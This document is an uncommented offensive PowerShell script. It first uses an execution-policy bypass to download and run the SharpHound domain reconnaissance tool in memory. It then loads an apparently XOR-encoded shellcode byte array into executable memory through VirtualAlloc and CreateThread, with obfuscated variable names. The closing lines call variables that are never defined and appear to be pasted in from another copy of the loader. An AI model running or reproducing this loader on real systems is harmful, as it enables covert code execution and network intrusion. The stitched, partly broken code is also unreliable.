powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All"



$iLIJxtbjEARTu = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$iBSNzTdtyp = Add-Type -memberDefinition $iLIJxtbjEARTu -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $HxSRsfmUGxY = 0xeb,0x27,0x5b,0x53,0x5f,0xb0,0xf,0xfc,0xae,0x75,0xfd,0x57,0x59,0x53,0x5e,0x8a,0x6,0x30,0x7,0x48,0xff,0xc7,0x48,0xff,0xc6,0x66,0x81,0x3f,0xb1,0x6b,0x74,0x7,0x80,0x3e,0xf,0x75,0xea,0xeb,0xe6,0xff,0xe1,0xe8,0xd4,0xff,0xff,0xff,0x13,0x8,0xf,0xef,0x40,0x90,0xec,0xe3,0xe0,0xdf,0x8,0x13,0x8,0x52,0x59,0x52,0x58,0x41,0x40,0x22,0xda,0x42,0x6d,0x5b,0x83,0x41,0x68,0x5b,0x83,0x41,0x10,0x5b,0x83,0x41,0x28,0x45,0x40,0x1c,0xbf,0x59,0x42,0x5b,0x83,0x61,0x58,0x5e,0x39,0xda,0x40,0x22,0xc8,0xbf,0x34,0x72,0x74,0x11,0x24,0x33,0x49,0xd2,0xc1,0x1e,0x49,0x12,0xc9,0xf1,0xe5,0x41,0x49,0x42,0x40,0x98,0x5a,0x33,0x83,0x51,0x34,0x5b,0x9,0xc3,0x6e,0x92,0x70,0xb,0x3,0x11,0x7,0x96,0x7a,0x13,0x8,0x13,0x83,0x93,0x80,0x13,0x8,0x13,0x40,0x96,0xc8,0x67,0x6f,0x5b,0x9,0xc3,0x58,0x57,0x83,0x53,0x28,0x5a,0x9,0xc3,0x83,0x5b,0x10,0xf0,0x5e,0x5e,0x39,0xda,0x40,0xec,0xc1,0x52,0x83,0x27,0x80,0x5b,0x9,0xc5,0x40,0x22,0xc8,0x52,0xc9,0xda,0x5,0xbf,0x49,0x12,0xc9,0x2b,0xe8,0x66,0xf9,0x5f,0xb,0x5f,0x2c,0x1b,0x4d,0x2a,0xd9,0x66,0xd0,0x4b,0x4c,0x98,0x48,0x37,0x41,0x12,0xd8,0x75,0x49,0x98,0x4,0x5b,0x4c,0x98,0x48,0xf,0x41,0x12,0xd8,0x52,0x83,0x17,0x80,0x5b,0x9,0xc3,0x49,0x4b,0x49,0x4b,0x56,0x4a,0x52,0x52,0x50,0x52,0x51,0x52,0x52,0x5b,0x8b,0xff,0x28,0x52,0x5a,0xec,0xe8,0x4b,0x49,0x4a,0x52,0x5b,0x83,0x1,0xe1,0x58,0xf7,0xec,0xf7,0x4e,0x40,0x22,0xd3,0x40,0x41,0xad,0x7f,0x7a,0x66,0x7a,0x66,0x76,0x7c,0x13,0x49,0x45,0x40,0x9a,0xe9,0x5a,0xcf,0xd1,0x44,0x64,0x2e,0x14,0xf7,0xc6,0x5b,0x40,0x40,0x9a,0xe9,0x40,0x52,0x5e,0x39,0xd3,0x45,0x22,0xc1,0x40,0x5b,0x5a,0xb2,0x29,0x5e,0x6a,0xaf,0x13,0x8,0x13,0x8,0xec,0xdd,0xfb,0x10,0x13,0x8,0x13,0x66,0x7e,0x69,0x63,0x25,0x65,0x65,0x3d,0x7b,0x76,0x6b,0x66,0x7a,0x72,0x25,0x67,0x6d,0x60,0x7c,0x3d,0x6b,0x7c,0x65,0x13,0x52,0x5b,0x81,0xd2,0x41,0xd4,0xc8,0xa8,0x9,0x13,0x8,0x5e,0x39,0xda,0x5b,0x40,0x62,0x10,0x5b,0x5a,0xb2,0x44,0x81,0x8c,0xce,0x13,0x8,0x13,0x8,0xec,0xdd,0xfb,0x87,0x13,0x8,0x13,0x27,0x59,0x5d,0x61,0x49,0x75,0x44,0x63,0x78,0x63,0x44,0x7f,0x70,0x5b,0x50,0x52,0x6e,0x55,0x4f,0x46,0x6d,0x42,0x49,0x7a,0x50,0x70,0x7a,0x41,0x78,0x5e,0x7c,0x66,0x70,0x78,0x6f,0x58,0x59,0x76,0x31,0x50,0x4d,0x3e,0x7a,0x24,0x45,0x64,0x5e,0x44,0x30,0x7d,0x78,0x57,0x67,0x5f,0x61,0x5b,0x4d,0x4c,0x30,0x46,0x49,0x20,0x4d,0x7a,0x39,0x78,0x47,0x40,0x79,0x50,0x42,0x42,0x6f,0x5c,0x6e,0x69,0x7c,0x74,0x3e,0x65,0x46,0x2b,0x38,0x70,0x38,0x69,0x6d,0x27,0x6d,0x5b,0x6d,0x7f,0x5b,0x64,0x3b,0x7f,0x4f,0x64,0x64,0x6b,0x38,0x45,0x5a,0x52,0x3f,0x78,0x6a,0x56,0x45,0x5a,0x3b,0x7d,0x67,0x60,0x5a,0x61,0x42,0x72,0x66,0x7c,0x3f,0x46,0x71,0x21,0x78,0x72,0x50,0x44,0x44,0x24,0x6b,0x7c,0x62,0x45,0x59,0x79,0x45,0x59,0x5c,0x5c,0x66,0x2a,0x8,0x5b,0x81,0xd2,0x5b,0x49,0x49,0x4b,0x45,0x22,0xc1,0x40,0x40,0xab,0x8,0x21,0xa0,0x97,0x8,0x13,0x8,0x13,0x58,0x40,0x5b,0x5a,0xcf,0xd1,0xe3,0x46,0x26,0x28,0xf7,0xc6,0x40,0x9a,0xce,0x79,0x2,0x4c,0x40,0x9a,0xf9,0x79,0x17,0x49,0x5a,0x7b,0x88,0x20,0x8,0x13,0x41,0x9a,0xe8,0x79,0xc,0x52,0x51,0x5a,0xb2,0x66,0x4e,0x8d,0x8e,0x13,0x8,0x13,0x8,0xec,0xdd,0x5e,0x39,0xd3,0x5b,0x49,0x40,0x9a,0xf9,0x5e,0x39,0xda,0x45,0x22,0xc1,0x40,0x5b,0x5a,0xcf,0xd1,0x25,0x15,0x10,0x68,0xf7,0xc6,0x8d,0xd3,0x7d,0xc,0x40,0xd4,0xc9,0x9b,0x1b,0x13,0x8,0x5a,0xb2,0x57,0xf8,0x26,0xe8,0x13,0x8,0x13,0x8,0xec,0xdd,0x5b,0xf7,0xdc,0x7c,0x11,0xe3,0xb9,0xe0,0x46,0x8,0x13,0x8,0x40,0x51,0x79,0x48,0x49,0x41,0x9a,0xd9,0xd2,0xea,0x3,0x41,0xd4,0xc8,0x13,0x18,0x13,0x8,0x5a,0xb2,0x4b,0xac,0x40,0xed,0x13,0x8,0x13,0x8,0xec,0xdd,0x5b,0x9b,0x40,0x5b,0x5b,0x81,0xf4,0x40,0x9a,0xf9,0x5b,0x81,0xc9,0x41,0xd4,0xc8,0x13,0x28,0x13,0x8,0x5a,0x81,0xea,0x41,0xa9,0x1a,0x85,0x81,0xf1,0x8,0x13,0x8,0x13,0xf7,0xc6,0x40,0x90,0xcc,0x33,0x8d,0xd3,0x7c,0xa1,0x6e,0x98,0xf,0x5b,0x9,0xd0,0x8d,0xd3,0x7d,0xc1,0x50,0xd0,0x50,0x79,0x8,0x4a,0x41,0xd4,0xca,0xe3,0xbd,0xb1,0x5e,0xec,0xdd,0xb1,0x6b


$UFiRHPLKR = $iBSNzTdtyp::VirtualAlloc(0,[Math]::Max($HxSRsfmUGxY.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($HxSRsfmUGxY,0,$UFiRHPLKR,$HxSRsfmUGxY.Length)

$iBSNzTdtyp::CreateThread(0,0,$UFiRHPLKR,0,0,0)

[System.Runtime.InteropServices.Marshal]::Copy($OFMryOcQpBrL,0,$twVfsCCICfGWV,$OFMryOcQpBrL.Length)

$HLqxZvtXf::CreateThread(0,0,$twVfsCCICfGWV,0,0,0)
